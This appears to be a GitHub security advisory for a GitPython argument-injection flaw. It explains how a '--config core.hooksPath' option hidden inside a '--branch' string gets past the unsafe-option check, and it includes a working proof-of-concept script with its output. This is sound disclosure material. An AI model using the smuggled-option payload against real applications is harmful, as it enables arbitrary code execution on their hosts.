GHSA-x2qx-6953-8485

Source

https://github.com/advisories/GHSA-x2qx-6953-8485

Import Source

https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/04/GHSA-x2qx-6953-8485/GHSA-x2qx-6953-8485.json

JSON Data

https://api.osv.dev/v1/vulns/GHSA-x2qx-6953-8485

Aliases

CVE-2026-42284

Downstream

MINI-242j-jwxh-4f7q

Related

CGA-8pr5-gmq5-xw9j

Published

2026-04-25T23:41:49Z

Modified

2026-05-13T13:54:47.674468Z

Severity

8.1 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H CVSS Calculator

Summary

GitPython: Unsafe option check validates multi_options before shlex.split transformation

Details

Summary

_clone() validates multi_options as the original list, then executes shlex.split(" ".join(multi_options)). A string like "--branch main --config core.hooksPath=/x" passes validation (starts with --branch), but after split becomes ["--branch", "main", "--config", "core.hooksPath=/x"]. Git applies the config and executes attacker hooks during clone.

Details

The vulnerable code is in git/repo/base.py line 1383:

multi = shlex.split(" ".join(multi_options))

Then validation runs on the original list at line 1390:

Git.check_unsafe_options(options=multi_options, unsafe_options=cls.unsafe_git_clone_options)

Then execution uses the transformed result at line 1392:

proc = git.clone(multi, "--", url, path, ...)

The check at git/cmd.py line 959 uses startswith:

if option.startswith(unsafe_option) or option == bare_option:

"--branch main --config ..." does not start with "--config", so it passes. After shlex.split, "--config" becomes its own token and reaches git.

Also affects Submodule.update() via clone_multi_options.

PoC

import sys, pathlib, subprocess
sys.path.insert(0, str(pathlib.Path(__file__).resolve().parent))

from git import Repo
from git.exc import UnsafeOptionError

try:
    Repo.clone_from("/nonexistent", "/tmp/x", multi_options=["--config", "core.hooksPath=/x"])
except UnsafeOptionError:
    print("multi_options=['--config', '...']: Block as expected")
except Exception:
    pass

DIR = pathlib.Path(__file__).resolve().parent / "workdir_b"
SRC = DIR / "repo"
DST = DIR / "dst"
HOOKS = DIR / "hooks"
LOG = DIR / "output.log"

if not SRC.exists():
    SRC.mkdir(parents=True)
    r = lambda *a: subprocess.run(a, cwd=SRC, capture_output=True)
    r("git", "init", "-b", "main")
    (SRC / "f").write_text("x\n")
    r("git", "add", ".")
    r("git", "commit", "-m", "init")

HOOKS.mkdir(exist_ok=True)
hook = HOOKS / "post-checkout"
hook.write_text(f"#!/bin/sh\nwhoami > {LOG.as_posix()}\nhostname >> {LOG.as_posix()}\n")
hook.chmod(0o755)

LOG.unlink(missing_ok=True)
payload = "--branch main --config core.hooksPath=" + HOOKS.as_posix()

try:
    Repo.clone_from(str(SRC), str(DST), multi_options=[payload])
except UnsafeOptionError:
    print(f"multi_options=['{payload}']: BLOCKED"); sys.exit(1)
except Exception:
    pass

if not LOG.exists() and DST.exists():
    subprocess.run(["git", "checkout", "--force", "main"], cwd=DST, capture_output=True)

print(f"multi_options=['{payload}']: not blocked")
print(f"\nHook executed: {LOG.exists()}")
if LOG.exists():
    print(LOG.read_text().strip())

Output:

multi_options=['--config', '...']: Block as expected
multi_options=['--branch main --config core.hooksPath=.../hooks']: not blocked

Hook executed: True
texugo
DESKTOP-5w5HH79

Impact

Any application passing user input to multi_options in clone_from(), clone(), or Submodule.update() is vulnerable. Attacker embeds --config core.hooksPath=<dir> inside a string starting with a safe option. Check does not block it. Git executes attacker code. Same class as CVE-2023-40267.

Database specific

{
    "github_reviewed": true,
    "severity": "HIGH",
    "nvd_published_at": "2026-05-07T19:16:01Z",
    "cwe_ids": [
        "CWE-88"
    ],
    "github_reviewed_at": "2026-04-25T23:41:49Z"
}

References

Affected packages

PyPI / gitpython

Package

Name: gitpython; View open source insights on deps.dev
Purl: pkg:pypi/gitpython

Affected ranges

Type: ECOSYSTEM
Events: Introduced

0Unknown introduced version / All previous versions are affected

Fixed

3.1.47

Affected versions

0.*

0.1.7

0.2.0-beta1

0.3.0-beta1

0.3.0-beta2

0.3.1-beta2

0.3.2.RC1

0.3.2

0.3.2.1

0.3.3

0.3.4

0.3.5

0.3.6

0.3.7

1.*

1.0.0

1.0.1

1.0.2

2.*

2.0.0

2.0.1

2.0.2

2.0.3

2.0.4

2.0.5

2.0.6

2.0.7

2.0.8

2.0.9.dev0

2.0.9.dev1

2.0.9

2.1.0

2.1.1

2.1.2

2.1.3

2.1.4

2.1.5

2.1.6

2.1.7

2.1.8

2.1.9

2.1.10

2.1.11

2.1.12

2.1.13

2.1.14

2.1.15

3.*

3.0.0

3.0.1

3.0.2

3.0.3

3.0.4

3.0.5

3.0.6

3.0.7

3.0.8

3.0.9

3.1.0

3.1.1

3.1.2

3.1.3

3.1.4

3.1.5

3.1.6

3.1.7

3.1.8

3.1.9

3.1.10

3.1.11

3.1.12

3.1.13

3.1.14

3.1.15

3.1.16

3.1.17

3.1.18

3.1.19

3.1.20

3.1.22

3.1.23

3.1.24

3.1.25

3.1.26

3.1.27

3.1.28

3.1.29

3.1.30

3.1.31

3.1.32

3.1.33

3.1.34

3.1.35

3.1.36

3.1.37

3.1.38

3.1.40

3.1.41

3.1.42

3.1.43

3.1.44

3.1.45

3.1.46

Database specific

source

"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/04/GHSA-x2qx-6953-8485/GHSA-x2qx-6953-8485.json"